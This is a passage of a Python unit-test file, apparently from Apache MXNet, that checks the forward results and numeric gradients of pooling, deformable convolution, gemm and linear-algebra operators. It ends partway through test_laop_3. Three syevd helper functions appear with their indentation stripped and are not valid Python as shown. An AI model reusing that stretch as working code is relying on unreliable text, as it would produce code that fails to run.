def test_psroipooling_with_type():
    """PSROIPooling consistency on CPU across float64/float32/float16."""
    arg_params = {
        'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
    # plain psroipooling
    sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
    # Same shapes for every run; only the precision differs.
    ctx_list = [{'ctx': mx.cpu(0),
                 'psroipool_data': (1, 18, 14, 14),
                 'psroipool_rois': (2, 5),
                 'type_dict': {'psroipool_data': dtype, 'psroipool_rois': dtype}}
                for dtype in (np.float64, np.float32, np.float16)]
    check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
                                               'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
    """Numeric-gradient checks for contrib.DeformableConvolution (runs on GPU only)."""
    for num_batch in [1, 2]:
        for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
            for input_height, input_width in itertools.product([5, 6], [5, 6]):
                for dilate in [(1, 1), (2, 2)]:
                    for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
                        # pad == dilate with a 3x3 kernel keeps the spatial size.
                        output_height = input_height
                        output_width = input_width
                        im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
                        # Offsets scaled into (0.1, 0.9) to avoid sampling exactly
                        # on grid points, where the op is not differentiable.
                        offset_data = \
                            np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
                            * 0.8 + 0.1
                        weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
                        bias = np.zeros(num_channel_data)
                        im_data_var = mx.symbol.Variable(name="im_data")
                        offset_data_var = mx.symbol.Variable(name="offset_data")
                        weight_var = mx.symbol.Variable(name="weight")
                        bias_var = mx.symbol.Variable(name="bias")
                        op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
                                                                  offset=offset_data_var,
                                                                  weight=weight_var, bias=bias_var,
                                                                  num_filter=num_channel_data, pad=dilate,
                                                                  kernel=(3, 3), stride=(1, 1), dilate=dilate,
                                                                  num_deformable_group=num_deformable_group)
                        if grad_nodes[0] == 'offset_data':
                            # wider tolerance needed for coordinate differential
                            rtol, atol = 1.0, 1e-2
                        else:
                            rtol, atol = 0.05, 1e-3
                        # By now we only have gpu implementation
                        if default_context().device_type == 'gpu':
                            check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
                                                   grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
    """Re-draw ROI offsets that would place bilinear samples on grid points.

    Simulates the deformable PSROIPooling forward sampling and, whenever a
    sampling location lands (within 1e-3) on an integer coordinate — where
    bilinear interpolation is not differentiable — replaces that bin's
    (trans_x, trans_y) with fresh random values and re-checks. Returns a
    copy of ``input_offset`` with all offending offsets replaced.
    """
    num_rois = input_rois.shape[0]
    output_offset = input_offset.copy()
    # simulate deformable psroipooling forward function
    for roi_idx in range(num_rois):
        sub_rois = input_rois[roi_idx, :].astype(np.float32)
        img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
        # Map the ROI corners into feature-map coordinates.
        roi_start_w = round(x0) * spatial_scale - 0.5
        roi_start_h = round(y0) * spatial_scale - 0.5
        roi_end_w = round(x1 + 1) * spatial_scale - 0.5
        roi_end_h = round(y1 + 1) * spatial_scale - 0.5
        roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
        bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
        sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
        for c_top in range(output_dim):
            channel_each_cls = output_dim / num_classes
            class_id = int(c_top / channel_each_cls)
            for ph in range(pooled_h):
                for pw in range(pooled_w):
                    part_h = int(math.floor(float(ph) / pooled_h * part_size))
                    part_w = int(math.floor(float(pw) / pooled_w * part_size))
                    trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
                    trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
                    bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
                    need_check = True
                    while need_check:
                        pass_check = True
                        for ih in range(sample_per_part):
                            for iw in range(sample_per_part):
                                h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
                                w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
                                # Samples outside the feature map are ignored by the op.
                                if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
                                    continue
                                w = min(max(w, 0.1), feat_w - 1.1)
                                h = min(max(h, 0.1), feat_h - 1.1)
                                # if the following condition holds, the sampling location is not differentiable
                                # therefore we need to re-do the sampling process
                                if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
                                    trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
                                    pass_check = False
                                    break
                            if not pass_check:
                                break
                        if pass_check:
                            # Accepted: store the (possibly re-drawn) offsets back, unscaled.
                            output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
                            output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
                            need_check = False
    return output_offset
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
    """Numeric-gradient checks for contrib.DeformablePSROIPooling (GPU only)."""
    sample_per_part = 4
    trans_std = 0.1
    for num_rois in [1, 2]:
        for num_classes, num_group in itertools.product([2, 3], [2, 3]):
            for image_height, image_width in itertools.product([160, 224], [160, 224]):
                for grad_nodes in [['im_data'], ['offset_data']]:
                    spatial_scale = 0.0625
                    stride = int(1 / spatial_scale)
                    # builtin int(): np.int is a deprecated alias removed in NumPy 1.24
                    feat_height = int(image_height * spatial_scale)
                    feat_width = int(image_width * spatial_scale)
                    im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
                    rois_data = np.zeros([num_rois, 5])
                    # Keep the ROIs at least one stride away from the image borders.
                    rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
                    rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
                    offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
                    # at certain points, the bilinear interpolation function may be non-differentiable
                    # to avoid this, we check whether the input locates on the valid points
                    offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
                                                            sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
                    im_data_var = mx.symbol.Variable(name="im_data")
                    rois_data_var = mx.symbol.Variable(name="rois_data")
                    offset_data_var = mx.symbol.Variable(name="offset_data")
                    op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
                                                               trans=offset_data_var, spatial_scale=spatial_scale,
                                                               sample_per_part=4, group_size=num_group,
                                                               pooled_size=num_group, output_dim=num_classes,
                                                               trans_std=0.1, no_trans=False, name='test_op')
                    rtol, atol = 1e-2, 1e-3
                    # By now we only have gpu implementation
                    if default_context().device_type == 'gpu':
                        check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
                                               grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
    """Forward (and optionally numeric-gradient) checks for linalg.gemm/gemm2.

    Parameters
    ----------
    dtype : numpy dtype used for all test data.
    grad_check : numeric gradients are verified only when this equals 1.
    rtol_fw, atol_fw : tolerances for the forward checks.

    The previous version repeated the ``check_fw``/``if grad_check == 1``
    pair for every one of the 14 cases; that boilerplate is folded into
    ``check_case`` below. The cases themselves are unchanged.
    """
    num_eps = 1e-6
    rtol_bw = 1e-5
    atol_bw = 1e-6

    data1 = mx.symbol.Variable('data1')
    data2 = mx.symbol.Variable('data2')
    data3 = mx.symbol.Variable('data3')

    check_fw = lambda sym, location, expected :\
        check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
                               atol=atol_fw, dtype=dtype)
    check_grad = lambda sym, location:\
        check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
                               atol=atol_bw, dtype=dtype)

    def check_case(sym, location, expected):
        # Forward check; numeric gradient check only when requested.
        check_fw(sym, location, expected)
        if grad_check == 1:
            check_grad(sym, location)

    # Replicate a matrix 3x into a (3, 1, m, n) batch.
    rep_3x = lambda a, m, n :\
        np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))

    shape1 = (2, 3)
    shape2 = (3, 2)
    shape3 = (3, 3)
    shape4 = (2, 2)
    data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
    data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
    data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
    data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
    data_in1_t = np.transpose(data_in1)
    data_in2_t = np.transpose(data_in2)

    # Check all transpositions of gemm operator.
    check_case(mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.),
               [data_in1, data_in2, data_in4],
               [4. * np.dot(data_in1, data_in2) + 7. * data_in4])
    check_case(mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
                                  transpose_a=True, transpose_b=True),
               [data_in1, data_in2, data_in3],
               [4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3])
    check_case(mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
                                  transpose_a=True),
               [data_in1, data_in1, data_in3],
               [4. * np.dot(data_in1_t, data_in1) + 7. * data_in3])
    check_case(mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
                                  transpose_b=True),
               [data_in1, data_in1, data_in4],
               [4. * np.dot(data_in1, data_in1_t) + 7. * data_in4])

    # Check batch of gemm.
    a = rep_3x(data_in1, 2, 3)
    b = rep_3x(data_in2, 3, 2)
    c = rep_3x(data_in4, 2, 2)
    r = rep_3x(4. * np.dot(data_in1, data_in2) + 7. * data_in4, 2, 2)
    check_case(mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.),
               [a, b, c], [r])
    # Check for different axis that describes matrix rows.
    a2 = np.copy(np.swapaxes(a, 0, 2))
    b2 = np.copy(np.swapaxes(b, 0, 2))
    c2 = np.copy(np.swapaxes(c, 0, 2))
    r2 = np.copy(np.swapaxes(r, 0, 2))
    check_case(mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0),
               [a2, b2, c2], [r2])
    a2 = np.copy(np.swapaxes(a, 1, 2))
    b2 = np.copy(np.swapaxes(b, 1, 2))
    c2 = np.copy(np.swapaxes(c, 1, 2))
    r2 = np.copy(np.swapaxes(r, 1, 2))
    check_case(mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3),
               [a2, b2, c2], [r2])

    # Check gemm2 operator same way as gemm.
    check_case(mx.sym.linalg.gemm2(data1, data2, alpha=4.),
               [data_in1, data_in2], [4. * np.dot(data_in1, data_in2)])
    check_case(mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
                                   transpose_b=True),
               [data_in1, data_in2], [4. * np.dot(data_in1_t, data_in2_t)])
    check_case(mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True),
               [data_in1, data_in1], [4. * np.dot(data_in1_t, data_in1)])
    check_case(mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True),
               [data_in1, data_in1], [4. * np.dot(data_in1, data_in1_t)])

    # Check batch of gemm2.
    a = rep_3x(data_in1, 2, 3)
    b = rep_3x(data_in2, 3, 2)
    r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
    check_case(mx.sym.linalg.gemm2(data1, data2, alpha=4.), [a, b], [r])
    a2 = np.copy(np.swapaxes(a, 0, 2))
    b2 = np.copy(np.swapaxes(b, 0, 2))
    r2 = np.copy(np.swapaxes(r, 0, 2))
    check_case(mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0), [a2, b2], [r2])
    a2 = np.copy(np.swapaxes(a, 1, 2))
    b2 = np.copy(np.swapaxes(b, 1, 2))
    r2 = np.copy(np.swapaxes(r, 1, 2))
    check_case(mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3), [a2, b2], [r2])
# Test gemm separately from other la-operators.
@with_seed()
def test_gemm():
    """Run the gemm/gemm2 test helper in float64 and float32, toggling TensorOp math on GPU."""
    conv_flag = "MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"
    # Full-precision run with numeric gradient checking enabled.
    _gemm_test_helper(np.float64, True)
    # float32 run with TensorOp conversion disabled.
    os.environ[conv_flag] = "0"
    _gemm_test_helper(np.float32, False, rtol_fw=1e-5, atol_fw=1e-7)
    if default_context().device_type == 'gpu':
        # On GPU, repeat with TensorOp conversion allowed (looser tolerances),
        # then restore the flag to its disabled state.
        os.environ[conv_flag] = "1"
        _gemm_test_helper(np.float32, False, rtol_fw=2e-5, atol_fw=2e-7)
        os.environ[conv_flag] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
    """Symmetrize symbol `a` over its last two axes: 0.5 * (a + a^T)."""
    assert ndims >= 2
    # Permutation that swaps the last two axes and leaves the rest alone.
    axes = list(range(ndims))
    axes[-2], axes[-1] = axes[-1], axes[-2]
    return 0.5 * (a + mx.sym.transpose(a, axes=tuple(axes)))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
    """Zero out one triangle of `a` (whose last two dims must both be m) via a 0/1 mask."""
    assert ndims >= 2
    # Start from the identity matrix (the diagonal), built as one-hot rows.
    diag_idx = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
    mask = mx.sym.one_hot(diag_idx, depth=m, dtype=dtype)
    # Add one sub-diagonal band per iteration: j zero rows on top, then
    # one-hot rows hitting columns 0 .. m-j-1.
    for j in range(1, m):
        zeros_top = mx.sym.zeros(shape=(j, m), dtype=dtype)
        band_idx = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
        band = mx.sym.one_hot(band_idx, depth=m, dtype=dtype)
        mask = mask + mx.sym.concat(*[zeros_top, band], dim=0)
    if not lower:
        # Mirror the lower-triangular mask to obtain the upper one.
        mask = mx.sym.reshape(mask, shape=(m, m))
        mask = mx.sym.transpose(mask, axes=(1, 0))
    # Reshape so the (m, m) mask broadcasts across all leading dimensions of `a`.
    bcast_shape = tuple([1] * (ndims - 2) + [m, m])
    mask = mx.sym.reshape(mask, shape=bcast_shape)
    return mx.sym.broadcast_mul(a, mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@with_seed()
def test_laop():
    """Forward and numeric-gradient tests for the basic linalg operators
    (potrf, potri, trsm, trmm, sumlogdiag), run for both lower and upper triangles."""
    dtype = np.float64
    rtol_fw = 1e-7
    atol_fw = 1e-9
    num_eps = 1e-6
    rtol_bw = 1e-5
    atol_bw = 1e-6
    # enable numerical checking of gradients
    grad_check = 1
    data1 = mx.symbol.Variable('data1')
    data2 = mx.symbol.Variable('data2')
    data3 = mx.symbol.Variable('data3')
    # Forward check against an explicit expected result, at the tolerances above.
    check_fw = lambda sym, location, expected :\
        check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
                               atol=atol_fw, dtype=dtype)
    # Numeric (finite-difference) gradient check.
    check_grad = lambda sym, location:\
        check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
                               atol=atol_bw, dtype=dtype)
    # Tile an (m, n) matrix into a batch of shape (3, 1, m, n).
    rep_3x = lambda a, m, n :\
        np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
    for lower in [True, False]:
        upper = not lower
        # Tests with trivial 1x1 matrices: every op reduces to scalar arithmetic.
        shape = (4, 4, 1, 1)
        data_in = np.random.uniform(1, 10, shape)
        # test potrf
        # Note: Have to symmetrize input, for gradient test to work
        res_potrf = np.sqrt(data_in)
        test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
        check_fw(test_potrf, [data_in], [res_potrf])
        if grad_check == 1:
            check_grad(test_potrf, [data_in])
        # test potri
        ones = mx.nd.ones(shape).asnumpy()
        res_potri = np.divide(ones, data_in * data_in)
        test_potri = mx.sym.linalg.potri(data1, lower=lower)
        check_fw(test_potri, [data_in], [res_potri])
        if grad_check == 1:
            check_grad(test_potri, [data_in])
        # test trsm
        trian_in = data_in * 7.
        test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
        check_fw(test_trsm, [trian_in, data_in], [ones])
        if grad_check == 1:
            check_grad(test_trsm, [trian_in,data_in])
        # test trmm
        trian_in = np.divide(ones, trian_in)
        test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
                                       rightside=True, lower=lower)
        check_fw(test_trmm, [trian_in, data_in], [ones])
        if grad_check == 1:
            check_grad(test_trmm, [trian_in, data_in])
        # test sumlogdiag
        res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
        test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
        check_fw(test_sumlogdiag, [data_in], [res_sumlogdiag])
        if grad_check == 1:
            check_grad(test_sumlogdiag, [data_in])
        # more elaborate example of Cholesky factorization:
        # matrix == trian * trian^T with trian lower-triangular, inv == matrix^-1.
        matrix = np.array([[9., 3., -6., 12.],
                           [3., 26., -7., -11.],
                           [-6., -7., 9., 7.],
                           [12., -11., 7., 65.]])
        trian = np.array([[3., 0., 0., 0.],
                          [1., 5., 0., 0.],
                          [-2., -1., 2., 0.],
                          [4., -3., 6., 2.]])
        # NOTE(review): this local name shadows the builtin pow() within this scope.
        pow = np.array([[2., 1., 1., 1.],
                        [1., 4., 1., 1.],
                        [1., 1., 8., 1.],
                        [1., 1., 1., 16.]])
        inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
                        [0.05/3., 0.05, 0.05, 0.],
                        [2.65, 0.05, 2.5, -0.75],
                        [-2.5/3., 0., -0.75, 0.25]])
        ident = np.eye(4)
        low_trian = trian
        if not lower:
            trian = np.transpose(trian)
        # test potrf
        test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
        a = rep_3x(matrix, 4, 4)
        r = rep_3x(trian, 4, 4)
        check_fw(test_potrf, [a], [r])
        if grad_check == 1:
            check_grad(test_potrf, [a])
        #test potri
        data1_ltri = _make_triangle_symm(
            data1, ndims=4, m=4, lower=lower, dtype=dtype)
        test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
        a = rep_3x(trian, 4, 4)
        r = rep_3x(inv, 4, 4)
        check_fw(test_potri, [a], [r])
        if grad_check == 1:
            check_grad(test_potri, [a])
        # test trsm
        test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
        a = rep_3x(trian, 4, 4)
        b = rep_3x(matrix, 4, 4)
        r = rep_3x(7. * np.transpose(low_trian), 4, 4)
        check_fw(test_trsm, [a, b], [r])
        if grad_check == 1:
            check_grad(test_trsm, [a, b])
        test_trsm2 = mx.sym.linalg.trsm(
            data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
        r = rep_3x(-2. * low_trian, 4, 4)
        check_fw(test_trsm2, [a, b], [r])
        if grad_check == 1:
            check_grad(test_trsm2, [a, b])
        test_trsm3 = mx.sym.linalg.trsm(
            data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
        b = rep_3x(np.transpose(low_trian), 4, 4)
        r = rep_3x(0.5 * ident, 4, 4)
        check_fw(test_trsm3, [a, b], [r])
        if grad_check == 1:
            check_grad(test_trsm3, [a, b])
        test_trsm4 = mx.sym.linalg.trsm(
            data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
        b = rep_3x(low_trian, 4, 4)
        r = rep_3x(-0.5 * ident, 4, 4)
        check_fw(test_trsm4, [a, b], [r])
        if grad_check == 1:
            check_grad(test_trsm4, [a, b])
        # test trmm
        test_trmm = mx.sym.linalg.trmm(
            data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
        a = rep_3x(trian, 4, 4)
        b = rep_3x(matrix, 4, 4)
        r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
        check_fw(test_trmm, [a, b], [r])
        if grad_check == 1:
            check_grad(test_trmm, [a, b])
        test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
        r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
        check_fw(test_trmm2, [a, b], [r])
        if grad_check == 1:
            check_grad(test_trmm2, [a, b])
        test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
        r = rep_3x(np.dot(matrix, trian), 4, 4)
        check_fw(test_trmm3, [a, b], [r])
        if grad_check == 1:
            check_grad(test_trmm3, [a, b])
        test_trmm4 = mx.sym.linalg.trmm(
            data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
        r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
        check_fw(test_trmm4, [a, b], [r])
        if grad_check == 1:
            check_grad(test_trmm4, [a, b])
        # test sumlogdiag: diagonal of `pow` is powers of 2, so the sum of logs is 10*log(2).
        a = rep_3x(pow, 4, 4)
        r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
        check_fw(test_sumlogdiag, [a], [r])
        if grad_check == 1:
            check_grad(test_sumlogdiag, [a])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
    """Group (Q*Q^T, L*Q) from the LQ factorization of `a`; used to check gelqf."""
    q_sym, l_sym = mx.sym.linalg.gelqf(a)
    orth_check = mx.sym.linalg.syrk(q_sym, transpose=False, alpha=1., name='Q_times_Qt')
    recon = mx.sym.linalg.trmm(l_sym, q_sym, alpha=1., name='L_times_Q')
    return mx.sym.Group([orth_check, recon])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
    """Return Q from gelqf, tying L into the graph as a zero term so it is not dangling."""
    q_out, l_out = mx.sym.linalg.gelqf(a)
    # Gradient blocked, value scaled to zero: L participates in the graph
    # without affecting the result.
    zero_term = mx.sym.sum(mx.sym.BlockGrad(l_out), axis=(), keepdims=True) * 0.0
    return mx.sym.broadcast_add(q_out, zero_term)
def _gelqf_second_output(a):
    """Return L from gelqf, tying Q into the graph as a zero term so it is not dangling."""
    q_out, l_out = mx.sym.linalg.gelqf(a)
    # Gradient blocked, value scaled to zero: Q participates in the graph
    # without affecting the result.
    zero_term = mx.sym.sum(mx.sym.BlockGrad(q_out), axis=(), keepdims=True) * 0.0
    return mx.sym.broadcast_add(l_out, zero_term)
def _syevd_combined_symbol(a):
    """Group (U*U^T, U^T*diag(lam)*U) from syevd(a): orthogonality and reconstruction checks."""
    u_sym, lam_sym = mx.sym.linalg.syevd(a)
    orth_check = mx.sym.linalg.syrk(u_sym, transpose=False, alpha=1., name='U_times_Ut')
    # Scale each row of U by its eigenvalue, then left-multiply by U^T.
    scaled_u = mx.sym.broadcast_mul(mx.sym.reshape(lam_sym, shape=(-2, 1)), u_sym)
    recon = mx.sym.linalg.gemm2(u_sym, scaled_u, alpha=1., transpose_a=True,
                                transpose_b=False, name='Ut_L_U')
    return mx.sym.Group([orth_check, recon])
@with_seed()
def test_laop_2():
    """Tests for linalg.syrk and linalg.gelqf: forward against NumPy references
    and numeric gradient checks, in single and batch mode."""
    dtype = np.float64
    rtol_fw = 1e-7
    atol_fw = 1e-9
    num_eps = 1e-6
    rtol_bw = 1e-5
    atol_bw = 1e-6
    # enable numerical checking of gradients
    grad_check = 1
    data1 = mx.symbol.Variable('data1')
    # Forward check against an explicit expected result.
    check_fw = lambda sym, location, expected :\
        check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
                               atol=atol_fw, dtype=dtype)
    # Numeric (finite-difference) gradient check.
    check_grad = lambda sym, location:\
        check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
                               atol=atol_bw, dtype=dtype)
    # Tile an (m, n) matrix into a batch of shape (3, 1, m, n).
    rep_3x = lambda a, m, n :\
        np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
    # Tests for linalg.syrk
    mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
    for m, n, alpha in mnalpha_lst:
        #print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
        data_in1 = np.random.uniform(1, 10, (m, n))
        res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
        test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
        check_fw(test_syrk1, [data_in1], [res_syrk1])
        if grad_check == 1:
            check_grad(test_syrk1, [data_in1])
        res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
        test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
        check_fw(test_syrk2, [data_in1], [res_syrk2])
        if grad_check == 1:
            check_grad(test_syrk2, [data_in1])
        # Batch mode (3x the same thing)
        a_batch = rep_3x(data_in1, m, n)
        r1_batch = rep_3x(res_syrk1, m, m)
        check_fw(test_syrk1, [a_batch], [r1_batch])
        if grad_check == 1:
            check_grad(test_syrk1, [a_batch])
        r2_batch = rep_3x(res_syrk2, n, n)
        check_fw(test_syrk2, [a_batch], [r2_batch])
        if grad_check == 1:
            check_grad(test_syrk2, [a_batch])
    # Tests for linalg.gelqf
    # Currently disabled on GPU as they need cuda8
    # and MxNet builds use cuda 7.5
    if not (default_context() == mx.cpu()):
        return
    test_gelqf2 = _gelqf_combined_symbol(data1)  # Outputs (dot(Q, Q.T), dot(L, Q))
    test_gelqf_q = _gelqf_first_output(data1)  # Output Q (L is not dangling)
    test_gelqf_l = _gelqf_second_output(data1)  # Output L (Q is not dangling)
    mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
    for m, n in mn_lst:
        #print('gelqf: m={}, n={}'.format(m, n))
        data_in1 = np.random.normal(0., 10., (m, n))
        # Q*Q^T must be the identity; L*Q must reconstruct the input.
        res_eye = np.eye(m)
        res_a = data_in1
        check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
        if grad_check == 1:
            # A => Q
            check_grad(test_gelqf_q, [data_in1])
            # A => L
            check_grad(test_gelqf_l, [data_in1])
        # Batch mode (3x the same thing)
        a_batch = rep_3x(data_in1, m, n)
        reye_batch = rep_3x(res_eye, m, m)
        ra_batch = a_batch
        check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
        if grad_check == 1:
            # A => Q
            check_grad(test_gelqf_q, [a_batch])
            # A => L
            check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
    """Return U from syevd, tying the eigenvalues into the graph as a zero term."""
    u_out, lam_out = mx.sym.linalg.syevd(a)
    # Gradient blocked, value scaled to zero: avoids a dangling second output.
    zero_term = mx.sym.sum(mx.sym.BlockGrad(lam_out), axis=(), keepdims=True) * 0.0
    return mx.sym.broadcast_add(u_out, zero_term)
def _syevd_second_output(a):
    """Return the eigenvalues from syevd, tying U into the graph as a zero term."""
    u_out, lam_out = mx.sym.linalg.syevd(a)
    # Gradient blocked, value scaled to zero: avoids a dangling first output.
    zero_term = mx.sym.sum(mx.sym.BlockGrad(u_out), axis=(), keepdims=True) * 0.0
    return mx.sym.broadcast_add(lam_out, zero_term)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
    """Tests for linalg.syevd: forward checks (orthogonality + reconstruction),
    explicit backward against the NumPy reference, and numeric gradient checks."""
    # Currently disabled on GPU as syevd needs cuda8
    # and MxNet builds use cuda 7.5
    if not (default_context() == mx.cpu()):
        return
    dtype = np.float64
    rtol_fw = 1e-6
    atol_fw = 1e-6
    num_eps = 1e-4
    rtol_bw = 1e-2
    atol_bw = 1e-2
    # enable numerical checking of gradients
    grad_check = 1
    data1 = mx.symbol.Variable('data1')
    # Forward check against an explicit expected result.
    check_fw = lambda sym, location, expected :\
        check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
                               atol=atol_fw, dtype=dtype)
    # Numeric (finite-difference) gradient check.
    check_grad = lambda sym, location:\
        check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
                               atol=atol_bw, dtype=dtype)
    # Tile an (m, n) matrix into a batch of shape (3, 1, m, n).
    rep_3x = lambda a, m, n :\
        np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
    # Backward check against explicit expected input gradients.
